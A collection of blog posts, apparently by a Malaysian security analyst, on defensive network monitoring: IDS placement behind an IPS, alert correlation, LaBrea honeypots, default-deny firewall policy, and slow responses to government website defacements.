Ayoi's

Oh yeah, while having a light drink with my colleagues discussing about the current problems that we faced and the required solutions, one of my colleagues provide one good story which IMHO enlighten our mood for the day. The story is like this.

He went for interview for a Firewall Analyst at one of the Multinational Companies here in Malaysia. During the interview, he was asked by one of the interviewers this question,

“Besides snort, can you give another example of sensor?”

(more…)

One of my colleagues from the technical support department asked me on the best emplacement of the internal sensor (IDS) if one network has IPS implemented as well. So I just give him a simple diagram to show him the usual emplacement of internal sensor when we have IPS implemented as well.

The reason why I would place my internal sensor (in this case DMZ sensor) behind IPS because:

a). I always believe that all the preventive measures will be defeated sooner or later. And if the DMZ sensor emplace in front of IPS, then what kind of indication we can have if the attack bypassed the IPS?

b). IF the sensor emplaced in front of the IPS, how do we know that one particular attack has been blocked or not by IPS?

Usually for this kind of emplacement, a good correlation between the alerts coming from the external IDS and internal IDS will help or assist analyst on determining whether the attack bypassed the preventive measures in form of firewalls and IPS. To enhance the identification process, both of the alerts will be compared against the logs retrieved from the targeted server.

As example let say the external sensor produce one alert stating that there is one remote file inclusion attempt on the web server. IF the internal sensor also produce the same alert, it means that this attempt successfully bypass the firewall (of cause) and the IPS as well. Only then the alert will be produced to the analyst console and IF only external sensor produce the alert, then it can be discarded or not presented to the analyst console. It may be used for statistical purpose perhaps.

Also another step will be if the external and internal sensor produce the same alert, then it will be compared against the web log obtained from the targeted web server. And if the response code for that attempt is 200 then these alerts will be produced to the analyst console, else those will be discarded.

BUT then my colleague said

“That’s what I’ve explained to them but their question is Why internal sensor generate too few alerts compared to the external sensor?”

I told him, “That means that their IPS has done a good job la !”

“Yeah, that’s what I thought so and I told them that but they still asking the same question.”

I’m out of words…

When I fires up my thunderbird this morning, I received one email from one of this blog readers (sounds like I have many readers eh?No lah) inquiring about on the requirements to get involve in this security field. From the content of the email, I can conclude that the sender is one of the students and it seems that she has the interest and perhaps the attitude as well and hopefully she won’t change her mind when she received my reply.

Because the 1st requirement that I pointed out to her is having the right attitude. Interest, passion, curiosity are few of the characteristics that can only help you in order to progress. Well some of our SAs here lacked this kind of attitude (One of the areas that I need to improve). Also the needs of having a good and sound fundamental, be it in networking, security or others. At least when you encountered these statements,

“Throttling :  LaBrea accepts new connection but advertises a very small receiver window. The receiver window instructs the sender to not send more data per packet than the window allows. When throttling, connections still make progress, albeit slowly.

Persistent capture : LaBrea advertises a TCP receiver window size of 0 and instructs the sender to wait before sending more data. Periodically, the sender comes back and sends window probe packets to determine if the window has opened up again. This state can be persist indefinitely.”

You will understand fully what are these statements trying to convey.

And yeah, that’s what I’ve taken from Virtual Honeypots book. It is about Low interactive type of Honeypot application called LaBrea. Low interaction honeypot is the one that only simulates or emulate services, responses or application as this type of honeypot is not meant to represent a fully featured operating system. As for LaBrea, it introduces the tarpit concept where it will try to slow down spammers or worm by making the TCP connection very slow or completely stalling their progress. How? By using the methods that I’ve mentioned above, basically by manipulating the window size. That’s why it is important to have this kind of knowledge. For time being this is my reading material while traveling in LRT. One of the things that I will definitely deploy. (Honeypot or perhaps honeynet)

taken from successfromthenest.com

Ahh, this idiom came into my mind when one of my former colleagues told me that one of our competitors will not entertain any job application from our staff (especially for security analyst post). Why? Because one of our former “analysts” joined their company a couple of years before and they quite surprise with her level of “knowledge”.

Surprise? Not for me tho. In fact, I’ve expected this kind of situation will surface once these fellas went out applying similar job at other companies. Well, they thought having the degree or certificates can guarantee them the job that they applied. Surprisingly (not so) some of them who have been working for a number of years as an analyst still failed to grasp the proper tasks, knowledge, skills required by an analyst.

Bahh… enuff mumbling. I think I do sound like a broken record. To be honest, I’m kinda fed up

Btw, before you start to install anything, please understand what are these applications meant to do.

Hmm.. I better keep my mouth shut now

Again, for this month (also for the past couple of months) I dun have the luxury to buy new books for reading, so just “kidnap” few papers printed by my boss for my own reading. Usually besides “cuci mata” during travel in the LRT, I spent most of the time reading. Actually those are the times that I only have (besides during having my meals at home or during performing my “business” in the toilet)

For time being I just start reading about a paper produced by Thomas H Ptacek and Timothy N. Newsham from securenetworks.com titled Insertion, Evasion, and Denial of Services: Eluding Network Intrusion Detection. And yes, the paper was produced in January 1998. The purpose of reading? just to satisfy my curiosity and my own knowledge. It’s a good paper and the concern that they raised in the paper are real and suitable at that time and some of it even applicable to the current time.

Hopefully I can finish up reading the article by today and can start looking for other printed reading materials in the office

And no, Adam is not holding my reading material and Ariff is not eating that article as well. Those are my letters 

Does Monitoring still relevant if they going to implement IPS?

That’s one of the questions posed by my big Boss that really attract my attention to answer ( As usual my Big Boss always give a series of good topics  for our discussion which I really appreciate. It makes my brain working and somehow I do feel that I gained something valuables from these type of discussions even thought via emails)

So this is my reply

Interesting question tho. Of cause as one of the believers that Prevention Eventually Fails, I believe that the existence of IPS should never reduce the importance of detection. (Anyway before it can prevent, it has to detect first

Bejtlich says that Prevention Eventually fails because of the characteristics of the Intruders which are they are unpredictable and some of them are smarter than the defender.
Marcus Ranum says that Security is when people stops doing something stupid and from his thought “tell me what is so “deep” about knowing how to block 31 attacks ?” Even though that article is more on DPI capabilities in firewalls  but IMHO it is similar as perimeter security devices that incorporate IPS function.

And this is my thought;

Security is a process of reducing the risk to the acceptable level. This risk reduced by fulfilling the security process which is Assessment, protection, detection and response. Not long ago Organizations used to say that their network is secure when they have firewalls installed, and then when people realized that Firewalls only dealing with layer 2,3 and 4, IDS was introduced as an early warning detection system. And some smart guys think “if we can detect, why not we prevent the attacks as well?” Hence IPS was introduced in the market. IPS is more like giving those perimeter security devices views on what is happening above layer 5. And of cause, IPS like its predecessor IDS relies most of its detection/prevention mechanism on known attacks Signature based rules. Whether the signature is capturing the exploit or vulnerability is another issue.

Totally depending on this perimeter security devices (IPS/Firewalls/Proxy etc) is not a wise idea. Why? How can you prevent any attacks from unpredictable and smarter attackers? How to prevent any attacks that targeted to non-published attacks vector and vulnerabilities?

OK I can hear that some of you arguing that in case of 0-dayz attacks, event IDS will failed to produce alerts. Now lets discuss a lil bit about Detection,

For Detection process, it consists of Collection, Identification, Validation and Escalation. Let me point on Collection process. There are reasons why of having alert data, session data,  statistical data and full content data is the most ideal way of collecting network based information to assist analyst in Identification process. Anyway we also must aware that  Collecting  everything is Ideal but problematic  BUT to quote from  Taosecurity

“The advantage of collecting as much data as possible is the creation of options. Collecting full content data gives the ultimate set of options, like replaying traffic through an enhanced IDS signature set to discover previously overlooked incidents. Rich data collections provide material for testing people, policies, and products. Network-based data may provide the evidence to put a criminal behind bars.”

and

“NSM’s answer to the data collection issue is to not rely on a single tool to detect and escalate intrusions. While a protocol analyzer like Ethereal is well suited to interpret a dozen individual packets, it’s not the best tool to understand millions of packets. Turning to session data or statistics on the sorts of ports and addresses is a better way to identify suspicious activity.”

Lets imagine 3 scenario

Without IDS
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, and the attack patterns didn’t match any rules in IPS and no blocking actions. The victim complaints and all we can do is patch and proceed. But we never know what actually happens.

With IDS without proper Collection Process
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, the attack patterns didn’t match any rules in IPS so no blocking actions, the attack patterns didn’t match any rules in IDS and no alerts triggered. The victim complaints and all we can do is patch and proceed. But we never know what actually happens.

With IDS with proper Collection Process
An attacker attacks using 0-dayz exploits exploiting 0-dayz vulnerabilities on a workstation. Bypassed the firewalls, the attack patterns didn’t match any rules in IPS so no blocking actions and the attack patterns didn’t match any rules in IDS and no alerts triggered. The victim complaints and we can start investigate with the available data. Update the signatures and perhaps feed it to IPS and IDS plus the  information gathered can be used for  legal purposes

Detection Engine perhaps the main component in IDS. Its alerts will be the main indicators of suspicious events either occurred (compromised),  ongoing (exploitation), or will happen (vulnerability scanning) depending on the phases of compromise. For an analyst to perform his Identification process ( whether to categorize the suspicious event into normal or malicious) he needs all available resources or information to help his analysis. The main problem with IDS is the rate of false positives. The only ways to reduce it is by fine tuning our rules to suit our client environment and of cause we require our client inventory lists covering the assets that we monitor. It is easy to defend or monitor something that you know and aware.

I never say that we should abandon IPS nor any preventive measures. Like what I’ve stated before that Security is about reducing the risk of being compromised, we have to incorporate all security measures that perhaps may deter any potential intruders or attackers from launching or continue with his attacks. I dun believe in depending on one security product or only one security measure as for anyone who believe that his network is secured because having such and such products implemented in his network, he only manage his security based on belief and not by facts which in the end will fail spectacularly.

And of cause, Why a building that has biometric enabled access doors, access cards and security guards still needs CCTV?

Quite long eh? Anyway I would be grateful if any of you guys have any other opinions on this matter.

p/s: I’ve censored any sensitive/confidential statement tho

Ok I know it’s an old article that originally written for certifiedsecuritypro.com but the content of that article is relevant. To be honest I have a good laugh while reading the article tho. How true it is.

First of all yeah, the idea of “Default Permit” is really dumb. The favourite condition is when deciding the firewall policy or rules. I always asked by the question “For firewall rules or policy, should we allow first then deny or the other way around?”

I think MJR (Marcus J. Ranum) explanation should answer this question (and I intend to use it in my training class soon). His explanation on this issue,

“Back in the very early days of computer security, network managers would set up an internet connection and decide to secure it by turning off incoming telnet, incoming rlogin, and incoming FTP. Everything else was allowed through, hence the name “Default Permit.” This put the security practitioner in an endless arms-race with the hackers. Suppose a new vulnerability is found in a service that is not blocked – now the administrators need to decide whether to deny it or not, hopefully, before they got hacked”

Just like when your building has 65535 doors, how do you secure it? By telling the visitor that they can access any doors besides few or by telling them that they can NOT access the building unless using few designated doors?

Then 2ndly about Enumerating the Badness. It is about the time wasted on identifying, make a lists on the attack patterns/traffics or attack vectors instead of identifying or tracking the applications, normal traffics or pattern that running in the network or keeping tracks on what shud be running in our systems.  In other words, just allow the good traffics or application and deny unwanted or bad applications or traffics. “Default Deny” should be implemented instead of “Default Permit”

To quote MJR again;

“Why is “Enumerating Badness” a dumb idea? It’s a dumb idea because sometime around 1992 the amount of Badness in the Internet began to vastly outweigh the amount of Goodness. For every harmless, legitimate, application, there are dozens or hundreds of pieces of malware, worm tests, exploits, or viral code. Examine a typical antivirus package and you’ll see it knows about 75,000+ viruses that might infect your machine. Compare that to the legitimate 30 or so apps that I’ve installed on my machine, and you can see it’s rather dumb to try to track 75,000 pieces of Badness when even a simpleton could track 30 pieces of Goodness”

And the 3rd one is about the needs of having secure application design or framework instead of implement first and manage the bugs/flaws later

Well I think you should read it yourself.

One of my favourite sites nowadays is http://security.org.my where recently it published a series of defacement occurred on the .gov related sites reported by users. And surprisingly there are few websites that been re-defaced from time to time and sadly the response from the affected party is either little or non-existence.

There’s one commenter of the defaced posting said that

” I think the country still can survive even if Majlis Daerah Kinta Barat or Majlis Perbandaran Manjung got defaced”

I do agree with the statement. Yes, the country will survive with this kind of attacks occurred on our government related sites but then let me point out few things tho.

For me, defacement is an attack that will leave trace like a blinking neon light in the middle of the desert at night. Because we can determine the final intention of the attacker in executing his attacks. Easier to trace as most of the attacks are more on the web applications flaws and vulnerability which most of the time will be logged either by the web logs or by the IDS. And of cause, obviously you will know that the defaced web sites has been compromised. Ahh and most of the time the attacker consists of either script kiddies who stumbled upon few scripts or a beginner in this web attacks. I think just like when you use nikto/nessus to launch your web vuln scanning etc, as it DOES produce a huge amount of alerts for snort at least.

But again, I do wonder why the response either too slow or non-existence at all and for the case of re-defacement, is the administrator has taken any necessary action to prevent such incident? Most of the time the action will be the restoration of the web page(s). But do they identify why the defacement occurred on their sites? Did they perform their own assessment on their assets applications and platform? Did they perform their patch management accordingly? I guess there are many questions need to be answered by them.

My concern is not the defacement issues but more on the response. If they failed to react or giving response accordingly to these annoying(my view) attacks then let me give one scenario where it should put enuff ph34r in those administrator heart.

Imagine if there’s one attacker who has the knowledge, the skills, the tools and the motivation to launch his attack where he adhere the maxim of intrusion “minimize signal, maximize access and maximize damage”. His exploits are custom made tools where he identified unpublished vulnerability exists on the victim web application (0-dayz). His attacks traffic are well crafted to appear as normal traffics in the network and of cause for these 0-dayz attacks, they will bypass the firewalls, IPS and even managed to avoid the IDS alerts from triggered. Or worst, he will create an encrypted channel to enable him to communicate with the compromised machine on appeared normal ports. His final intention? To steal data.

IF our .gov related administrators failed to respond appropriately on web defacement attacks, just imagine what kind of respond that they will give with the attack that I’ve mentioned above. I can bet the respond is none

Am I concern? No I am not concern.. I am freaking worry.